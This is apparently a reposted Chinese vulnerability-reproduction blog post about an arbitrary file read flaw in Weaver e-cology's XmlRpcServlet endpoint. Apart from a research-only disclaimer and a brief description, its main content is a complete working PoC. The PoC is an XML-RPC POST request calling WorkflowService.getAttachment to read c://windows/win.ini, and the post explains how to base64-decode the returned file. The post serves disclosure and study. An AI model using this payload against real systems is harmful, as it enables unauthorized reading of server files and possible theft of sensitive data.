“ 人性的背后是白云苍狗,愿你我都是生活的高手。”

免责声明：文章中内容来源于互联网，涉及的所有内容仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章中涉及的漏洞均已修复，敏感信息均已做打码处理。利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不承担任何法律及连带责任！如有侵权烦请告知，我们会立即删除整改并向您致以歉意。

0x00.漏洞介绍

XmIRpcServlet接口处存在任意文件读取漏洞，攻击者可以任意读取该系统的文件

0x01.漏洞复现

poc如下

POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1Host: your-ip <?xml version="1.0" encoding="UTF-8"?><methodCall><methodName>WorkflowService.getAttachment</methodName><params><param><value><string>c://windows/win.ini</string></value></param></params></methodCall>

读取win.ini文件，返回base64后的内容

解密获取文件内容

遵守网络安全法，请勿用于非法入侵，仅供学习

原文始发于微信公众号（深白网安）：泛微e-cology XmlRpcServlet文件读取漏洞复现